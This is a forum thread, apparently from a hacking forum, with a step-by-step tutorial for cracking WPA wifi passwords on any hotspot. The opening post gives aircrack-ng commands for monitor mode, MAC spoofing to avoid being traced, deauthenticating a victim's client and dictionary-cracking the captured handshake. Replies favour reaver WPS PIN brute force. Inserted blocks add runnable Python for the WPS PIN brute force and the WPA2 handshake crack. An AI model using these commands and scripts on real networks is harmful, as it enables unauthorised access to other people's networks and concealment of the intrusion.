Hacking WPA Wifi Password - Printable Version
Sinisterly (https://sinister.ly), Forum: Hacking > Network Hacking, Thread: Hacking WPA Wifi Password (https://sinister.ly/Thread-Hacking-WPA-Wifi-Password)
Hacking WPA Wifi Password - friendlyGh0st - 03-09-2013

Guys, here is a quick tutorial on cracking any wireless network. I tried to make it user friendly. If you think it's a little complex to understand, go to the link mentioned at the bottom for a pictorial tut.

Requirements:
A PC installed with Linux Backtrack 5 RC2
Working Wireless LAN card installed (important part)
Huge updated dictionary file with passwords (Google it)

Go to any wifi hotspot and crack it..

Step 1: Run this command to check the available WLAN adapters.
Code:
airmon-ng
It should give you some output. It'll show us the WLAN interfaces. Now we know that we have only one wireless interface, wlan0.

Step 2: Now let's try to start the airmon service on the interface that we found in Step 1. Run the given command:
Code:
airmon-ng start wlan0
Ignore the errors mentioned above; in my case they did not create any trouble for me, but you might want to kill the conflicting services if your results are different from mine. By the second step we have started the service/monitor on wlan0, so we should now have an additional monitoring interface on the system. You can check whether a new interface mon0 has been added to your system by using the command ifconfig, else try Step 3.

Step 3: You should see another monitoring interface mon0 on your system by using the command ifconfig, or you can run the same command we did in Step 1. Here we can see the new monitoring interface mon0.

Step 4: A good hacker is always supposed to leave no trace of his break-in. If you run the command ifconfig and look closely you will find that the monitoring interface mon0 and the wireless interface wlan0 are sharing the same MAC address. In fact mon0 is sharing the same MAC address as wlan0; check the picture below. Now we have to put a fake MAC address on the monitoring interface to leave no trace. Let's bring the mon0 interface down, change the MAC address of mon0, and bring it back up by running the commands below:
Code:
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
ifconfig
Here we can see we have successfully changed the MAC address of our monitoring interface mon0.

Step 5: Let's start dumping the available wireless information. Run the command below:
Code:
airodump-ng mon0
Here my victim router's ESSID is AndroidHotSpot. The information that I need from here is:
BSSID (MAC): D0:C1:B1:5B:AC:33
CHANNEL: 6

Step 6: By now we have identified our victim; it's time to narrow this network down further. We need to know how many workstations/terminals are connected to this wireless network. Run this command with the network information that you obtained in Step 5:
Code:
airodump-ng -c 6 -w crackwpa --bssid D0:C1:B1:5B:AC:33 mon0
Here I can see that one client, the MAC address highlighted in green, is connected to this hotspot. To find the password you either need to be patient and wait for another client to connect to this hotspot, but time is money, so let's force this client to reconnect and do the auth handshake with the server so that we can capture the packets.
Note: Keep this session running and open another terminal for Step 7. Do not close the existing session.

Step 7: Let's force the already connected client to do the auth handshake again. Run the command given below in the new terminal session:
Code:
aireplay-ng -0 4 -a MAC-ADDR-OF-ROUTER -c MAC-ADDR-OF-CLIENT mon0

Final Step: Now finally we have the whole dump saved in the working directory; we just need to crack the packet capture using the dictionary file. Run the command below:
Code:
aircrack-ng crackwpa-01.cap -w list
** list is the name of my dictionary file.
That's all... Finally you'll have the key of the network..
Source: http://www.learn-ethical-hacking.com/2013/03/hacking-wpa-wifi-password-in-backtrack.html

RE: Hacking WPA Wifi Password - 4t0m0 - 03-09-2013

Do you really think you can crack some password like this ~|@#156#3t3nrn3t??.....? with a dictionary? It is impossible. I know there are some routers with default passwords, and there are some Android programs to get the default password, but if the user changes it I think it is going to be hard to get. WPA/WPA2 is hard work.

RE: Hacking WPA Wifi Password - zomgwtfbbq - 03-09-2013

(03-09-2013, 07:49 PM)4t0m0 Wrote: Do you really think you can crack some password like this ~|@#156#3t3nrn3t??.....?

There are a variety of that kind of routers, Thomson/Speedtouch and another one that I forgot. I made a port of the original script that can be found in the thc hacksuite, which you can download from the cms site in my signature.

RE: Hacking WPA Wifi Password - chmod - 03-09-2013

Which is why you use reaver. Almost all routers are using WPS nowadays, so why brute force a possibly long and complicated password when you can brute force a simple numeric PIN? Get that and the router will happily dump the plain text password. Brute forcing WPA passwords should only be used as a last resort, and intelligent setting of the rules can also speed up the process.

RE: Hacking WPA Wifi Password - 4t0m0 - 03-10-2013

Yes, the only way at the moment is finding some router with WPS activated with walsh and later trying with reaver, making pins. This is the life, my friends; I wait for the day it will be as easy as WEP.

RE: Hacking WPA Wifi Password - no47 - 04-17-2013

yea! reaver is better
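The arithmetic behind chmod's and 4t0m0's preference for reaver, as an added example that is not code from the thread or from reaver itself. A WPS PIN is eight decimal digits whose last digit is a checksum over the first seven, and the enrollee learns from the AP separately whether the first four digits were right (NACK after M4) before the last four are checked (NACK after M6). The FakeRegistrar below is a constructed stand-in for the AP that answers exactly that way; the target PIN 12345670 is also constructed (it happens to be checksum-valid).

```python
# Added example: WPS PIN checksum and the split-PIN brute force reaver performs.
# FakeRegistrar is a constructed stand-in for the AP, not a real WPS implementation.

def wps_checksum(first_seven: int) -> int:
    """Checksum digit over the first seven PIN digits (weights 3 and 1, alternating from the right)."""
    accum = 0
    pin = first_seven
    while pin:
        accum += 3 * (pin % 10)   # odd positions from the right weigh 3
        pin //= 10
        accum += pin % 10         # even positions weigh 1
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class FakeRegistrar:
    """Constructed stand-in for the AP side of WPS external-registrar enrolment."""

    def __init__(self, pin: str):
        assert is_valid_pin(pin)
        self._pin = pin
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self._pin[:4]:
            return "M4_NACK"      # first half rejected; second half never looked at
        if pin[4:] != self._pin[4:]:
            return "M6_NACK"      # first half accepted, second half rejected
        return "OK"


def brute_force_pin(registrar: FakeRegistrar):
    """Recover the PIN half by half, the way reaver does. Returns the PIN or None."""
    first_half = None
    for i in range(10_000):
        half = f"{i:04d}"
        # Any checksum-valid tail will do while only the first half is being probed.
        probe = half + "000" + str(wps_checksum(int(half + "000")))
        result = registrar.try_pin(probe)
        if result == "OK":
            return probe
        if result == "M6_NACK":
            first_half = half
            break
    if first_half is None:
        return None
    for j in range(1_000):   # only 10^3 tails: the 8th digit is fixed by the checksum
        tail = f"{j:03d}"
        candidate = first_half + tail + str(wps_checksum(int(first_half + tail)))
        if registrar.try_pin(candidate) == "OK":
            return candidate
    return None


def max_attempts() -> int:
    """Worst case: 10^4 first halves plus 10^3 second halves, not 10^8 full PINs."""
    return 10**4 + 10**3


if __name__ == "__main__":
    ap = FakeRegistrar("12345670")   # constructed target PIN
    print(brute_force_pin(ap), "after", ap.attempts, "attempts; worst case is", max_attempts())
```

The worst case is 11,000 online attempts, which is what makes the "upper bound of 10 hours" quoted later in the thread plausible at a few seconds per exchange; a WPA2 passphrase offers no such split oracle, which is why the tutorial's approach needs a dictionary.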
RE: Hacking WPA Wifi Password - moroaddict - 04-22-2013

That's a nice tut and thanks for your time, but I don't think anyone is going to bruteforce WPA anymore... simply, it can take a lot of YEARS to maybe crack the password.. reaver rules. Also, there is a program to automatically make a dictionary, and you can run it at the same time as aircrack.. read more about it in my tut about cracking WPA2 using a bruteforce attack.

RE: Hacking WPA Wifi Password - lady_godiva - 07-22-2013

If you need to crack WPA, I agree that if the router has WPS active then reaver is the best solution, as with an upper bound of 10 hours the PIN is likely to be recovered. Some methods at research level have been proposed, but no successful implementation could actually be made.

Cracking WPA or WPA2 can be infeasible if a strong password is used; however, consider that many users set their own weak password, which can easily be cracked. Many still use the ISP-assigned password, which most of the time can be cracked with specific algorithms. The only reliable passwords are the ones chosen by a user with security awareness (according to reports, not so many). Be also aware that a determined attacker can actually perform a bruteforce approach, trying all the possible combinations. This can be achieved by renting a cloud computing system (affordable nowadays), which can highly speed up the cracking process by spreading the work among different machines. Consider also CUDA-like approaches that speed up the bruteforcing problem a lot.
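What the tutorial's Final Step (aircrack-ng crackwpa-01.cap -w list) actually computes per dictionary word, and why lady_godiva's cost argument holds, as an added example that is not code from the thread or from aircrack-ng. For each candidate the cracker derives the PMK with PBKDF2-HMAC-SHA1 (4096 rounds, SSID as salt), expands it to the PTK with the two MACs and two nonces from the captured 4-way handshake, and checks the first 16 bytes (the KCK) against the MIC of EAPOL message 2. The SSID and BSSID are the ones from the tutorial; the client MAC, nonces, passphrase and word list are constructed here so the script runs offline, and the EAPOL frame is a minimal WPA2/CCMP message 2 built by the script rather than a real capture.

```python
# Added example: a WPA2 (key descriptor version 2) handshake dictionary attack written out by hand.
# Everything below except SSID and AP_MAC is constructed for the demo.
import hashlib
import hmac
import struct

SSID = "AndroidHotSpot"                      # ESSID from the tutorial
AP_MAC = bytes.fromhex("d0c1b15bac33")      # BSSID from the tutorial
STA_MAC = bytes.fromhex("001122334455")     # constructed client MAC
# EAPOL header(4) + descriptor type(1) + key info(2) + key length(2) + replay counter(8)
# + nonce(32) + IV(16) + RSC(8) + ID(8) puts the 16-byte MIC at offset 81.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces))."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame_with_zeroed_mic: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame)[:16]."""
    return hmac.new(kck, frame_with_zeroed_mic, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key frame for message 2 of the 4-way handshake (no key data)."""
    key_info = 0x010A   # MIC bit | pairwise key | descriptor version 2 (HMAC-SHA1-128)
    body = (b"\x02" + struct.pack(">HHQ", key_info, 16, 1)   # RSN descriptor, key len 16, replay 1
            + snonce + bytes(16) + bytes(8) + bytes(8) + mic + struct.pack(">H", 0))
    return b"\x01\x03" + struct.pack(">H", len(body)) + body   # EAPOL v1, type EAPOL-Key


def sample_handshake(passphrase: str):
    """Constructed stand-in for what airodump-ng would have captured for this SSID/BSSID."""
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, anonce, snonce)
    msg2 = build_eapol_msg2(snonce, eapol_mic(ptk[:16], build_eapol_msg2(snonce)))
    return anonce, snonce, msg2


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist):
    """The dictionary attack itself; returns the passphrase or None."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = msg2[:MIC_OFFSET] + bytes(16) + msg2[MIC_OFFSET + 16:]
    for word in wordlist:
        if not 8 <= len(word) <= 63:      # not a legal WPA passphrase; aircrack-ng skips these too
            continue
        pmk = pmk_from_passphrase(word, ssid)   # the expensive step: 4096 HMAC-SHA1 rounds per guess
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return word
    return None


def demo():
    anonce, snonce, msg2 = sample_handshake("letmein123")                     # constructed secret
    wordlist = ["short", "12345678", "password", "letmein123", "qwertyuiop"]  # constructed "list"
    return crack_handshake(SSID, AP_MAC, STA_MAC, anonce, snonce, msg2, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Every guess costs the full PBKDF2 derivation before a single MIC comparison, and the salt is the SSID, so precomputed tables only help against common network names; that is the cost the GPU and cloud arguments above are about. WPA (TKIP, descriptor version 1) differs only in the MIC function, HMAC-MD5 instead of HMAC-SHA1.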